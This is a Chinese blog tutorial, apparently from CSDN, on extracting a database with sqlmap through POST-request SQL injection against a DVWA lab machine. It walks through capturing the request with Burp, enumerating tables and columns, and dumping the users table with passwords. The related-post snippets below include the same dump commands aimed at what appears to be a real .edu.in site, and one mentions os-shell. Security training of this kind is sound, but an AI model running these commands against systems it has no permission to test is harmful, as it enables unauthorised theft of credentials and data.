SQLMAP 脱库过程(post请求,三种方法)

最新推荐文章于 2024-05-31 16:07:27 发布
最新推荐文章于 2024-05-31 16:07:27 发布
阅读量5.1k 收藏 8
点赞数 1
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41092600/article/details/104287297
版权

一、准备工作

1、sqlmap为python语言开发,因此需要具备python环境。

2、python环境搭建及sqlmap下载,可参考其他文章。(很多也很全,这个不是本文重点,因此略过)

二、环境搭建

1、本人使用的是Mac、windows7虚拟机,windows7中部署DVMA

2、以DVMA的sql注入为例(DVMA安全级别为medium),进行详细介绍。

三、post请求脱库三种方法

方法1:sqlmap -r xxx.txt

利用burp抓包,保存报文为txt文件,利用sqlmap指定文本注入。

方法2:sqlmap -u "url" --forms [最简单]

sqlmap的forms参数,会自动抓取post包。从而进行注入。

方法3:sqlmap -u "url" --data "key1=value1&key2=values&key3=values"

指定参数,key=value形式,多参数使用&符号链接。

四、post请求脱库(方法1:需借助burpsuit)
1、访问链接“http://192.168.200.130/DVWA/vulnerabilities/sqli/” User ID下拉“1” ,如下图。(此处不在验证sql注入,直接使用sqlmap脱库)

待测试链接为“http://192.168.200.130/DVWA/vulnerabilities/sqli/”,可发现没有参数,报文信息如下,将报文另存为post.txt:

2、开始sqlmap测试,python sqlmap.py -r "/Users/***/Desktop/post.txt" --batch

(-r 指定文件路径,类似于-u指定链接一样),可发现id存在注入,如下图。

3、获取当前数据库 --current-db参数,即python sqlmap.py -r "/Users/***/Desktop/post.txt" --batch --current-db

分析出当前数据库为dvwa

4、获取当前数据库下的表 --tables参数 即python sqlmap.py -r "/Users/***/Desktop/post.txt" --batch -D dvwa --tables

(-D:指定数据库名)

可发现,运行结果后,有两个表,分别是guestbook、users

5、获取指定表的列属性 --columns参数 即:python sqlmap.py -r "/Users/***/Desktop/post.txt" --batch -D dvwa -T users --columns

(-D:指定数据库名,-T:指定表名)

运行结果后,存在8个列属性,如下图所示。

6、正式脱库 --dump参数,即python sqlmap.py -r "/Users/***/Desktop/post.txt" --batch -D dvwa -T users -C "user,avatar,password,user_id" --dump

(-D:指定数据库名,-T:指定表名,-C:指定需要的列名,--dump代表下载)

可发现,已将相关信息下载到“/Users/***/.sqlmap/output/192.168.200.130/dump/dvwa/users.csv”目录下。

成功完成post请求注入的脱库。

doubboCode
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLMAP脱裤
aiquan9342的博客
12-19 1911
之前就有一个朋友问,咋使用sqlmap脱裤。然后我丢了一个参数给他,他好像懵逼懵逼的。今天又有一个哥们儿在群里问,行吧。就直接教一下。 其实很简单。 --dump这个参数就是用来脱裤的哟。如果你要拖整个表的话你可以加个-all(--dump-all) CODE: sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D ...
脱库和删库的实践及解决方案
深耕安全技术研究
02-03 5078
文章目录1.定义2.影响3.解决方案4.结论 1.定义 脱库:它属于来自外部恶意攻击。 删库:它属于是来自内部开发或运维人员的bug。 2.影响 但是在项目的业务是十分复杂,在一些紧急情况下还是很难避免需要直接操作数据库进行调试。 只要时间跨度足够长,运维及开发人员操作数据库就肯出现疏忽的很大可能性。 而且在我们开发项目的业务中还会出现各种各样的可能,包括活动漏洞数值漏洞等等,导致需要回档的运营事故并不罕见。 3.解决方案 就是生产环境的数据库不允许直接操作,不提供和不使用任何数据库管理工具或者命令行工具。
脱库了解一下
10-14
适用于小白,和开发人员了解的网络安全知识,防sql注入风险。
5、sqlmap注入post类型+os-shell
weixin_51520483的博客
05-21 359
3、上bp抓取数据包,sqlmmap用post注入走一遍,找到数据库,账号密码,这里的账号密码其实也没什么用,形同虚设。5、试一下shell注入,一试一个准,直接进去了,查看一下根目录发现flag。2、判断注入类型,是一个字符注入,使用or直接绕过密码进去了。6、成功进入shell,查看根目录文件,发现flag。3、发现数据库没有机会的情况,换os-shell注入。4、老规矩,数据表、字段挨个走一遍,但没有什么发现。-r:表示目标为一个文件,bp抓的包。-p:表示一个参数,即一个注入的口。
sqlmap DVWA脱库
qq_18831583的博客
04-06 1182
本文描述使用sqlmap对DVWA靶机进行脱库 一、先登录靶机,查看目标靶机的用户名密码 1、先查询dvwa靶机的登录代码文件 进入OWASP系统的/var/www/dvwa目录,查询login.php登录文件可知,存在sql注入,如下: 2、进入/var/www/dvwa/config目录,查看config.inc.php文件得到dvwa数据库的用户名和密码: 3、连接...
【安全测试学习】基于bWAPP靶场,使用sqlmap实现脱库实战
aovenus的专栏-测试新时代(微信公众号:测试新时代)
11-24 586
基于bWAPP靶场,使用sqlmap实现脱库实战
第三节 Sqlmap 请求参数设置-01
09-15
在本文中,我们将详细介绍 Sqlmap 的四个重要请求参数设置:设置 HTTP 方法、设置 POST 提交参数、设置参数分割符和设置 Cookie 头。 Sqlmap 设置 HTTP 方法 Sqlmap 会自动在探测过程中使用适合的 HTTP 请求方法。...
第七节 Sqlmap 请求参数设置5-01
09-15
"Sqlmap 请求参数设置详解" Sqlmap 是一款功能强大且流行的 SQL 注入工具,它提供了多种参数设置以满足不同场景下的需求。在本节课程中,我们将深入探讨 Sqlmap请求参数设置,包括忽略401、设置 HTTP 协议私钥、...
sqlmap安装包及教程.zip
12-23
3. 安装依赖:SQLMap可能需要Python环境以及一些特定的Python库,确保你的系统已经安装了Python,并用pip安装必要的依赖库,如`requests`和`urllib3`等。 4. 配置环境:将SQLMap的可执行脚本添加到系统的PATH环境...
sqlmap自动扫描工具
06-14
- **自动检测**:SQLMap能够自动识别多种类型的SQL注入漏洞,包括GET、POST和其他HTTP方法。 - **数据库枚举**:可以枚举数据库名称、数据库表和列,获取敏感信息。 - **数据提取**:支持从数据库中导出数据,...
PHP+MySQL脱库
07-02
PHP+MySQL脱库,WEBSHELL
sqlmap注入
10-26
SQLMap是一种广泛使用的开源自动化工具,专门用于检测和利用SQL注入漏洞。它的主要目标是帮助安全研究人员和渗透测试者在Web应用程序中发现和利用数据库漏洞。以下是对SQLMap注入相关知识点的详细介绍: **1. SQL...
SQLMAP 脱库过程(get请求
u011571189的专栏
03-20 1684
一、准备工作 1、sqlmap为python语言开发,因此需要具备python环境。 2、python环境搭建及sqlmap下载,可参考其他文章。(很多也很全,这个不是本文重点,因此略过) 二、环境搭建 1、本人使用的是Mac、windows7虚拟机,windows7中部署DVMA 2、以DVMA的sql注入为例(DVMA安全级别为low),进行详细介绍。 三、get请求脱库 1、访...
sqlmap脱库流程
最新发布
X1DD1Asad343的博客
05-31 311
1.探测漏洞是否存在sqlmap -u “https://www.ssc.edu.in/newsdetails.php?id=30”2.探测当前数据库用户sqlmap -u “https://www.ssc.edu.in/newsdetails.php?id=30” --current-users3.获取所有数据库sqlmap -u “https://www.ssc.edu.in/newsdetails.php?id=30” --dbs4.获取当前数据库sqlmap -u “https://www.ssc.
mysql盲注脱裤_BT5下使用SQLMAP入侵加脱裤 -电脑资料
weixin_39883705的博客
02-28 2800
早就听说BT5下的sqlmap功能很强大,今天终于下决心拒绝DOTA和苍老师的诱惑,静下心来研究研究这个传说中的sqlmap!由于在虚拟机里面用的 ,我直接在真机上也装了个BT5的系统,嘻嘻··,那感觉,真是流畅啊,各种不卡!简单介绍下sqlmap吧,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE...
脱库、撞库和洗库
answer3lin的博客
09-13 8741
拖库:本来是数据库领域的专用语,指从数据库中导出数据。而现在它被用来指网站遭到入侵后,黑客窃取数据库的行为。也就是网站被入侵以后数据库信息泄露了。 撞库:使用大量的一个网站的账号密码,去另一个网站尝试登陆。也就是基于用户代码重复度比较高的问题,使用被脱库的密码尝试其它网站。 洗库:黑客入侵网站在取得大量的用户数据之后,通过一系列的技术手段和黑色产业链将有价值的用户数据变现。类似于XQ。 社工库:黑客将获取的各种数据库关联起来,对用户进行全方位画像。AW里有收费的各种库,实际上是收集的用户的信息进行集合
脱库策略
Wengzhengcun的博客
12-27 508
直接存储客户的密码,存在被脱库后用户在其他App的密码与此密码相同,则同样会被窃取账户资料的风险。解决办法:不直接存储用户的密码,不管是明文的还是加密的密码,代之以用户账户+密码+秘钥生成的token,当用户登录时,输入密码,由后台服务器计算实时的token与数据库里的token是否一致,一致则认证通过,不一致则认证不通过。...
sqlmap怎么脱库
09-24
使用sqlmap进行脱库的步骤如下: 1. 首先,需要通过Burp Suite捕获post请求的数据包。打开Burp Suite,配置代理,然后在浏览器中发送post请求,将数据包保存到一个文件中。 2. 在命令行中使用sqlmap命令,指定参数-r后跟post请求数据包的文件路径,例如:`python sqlmap.py -r "/Users/***/Desktop/post.txt" --batch`。 3. sqlmap将自动分析请求数据包,并尝试进行注入测试。如果存在注入漏洞,它将继续执行后续的攻击步骤。 4. 如果需要获取当前数据库下的表,可以使用--tables参数,例如:`python sqlmap.py -r "/Users/***/Desktop/post.txt" --batch -D dvwa --tables`。 5. sqlmap将查询数据库,并列出所有的表。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值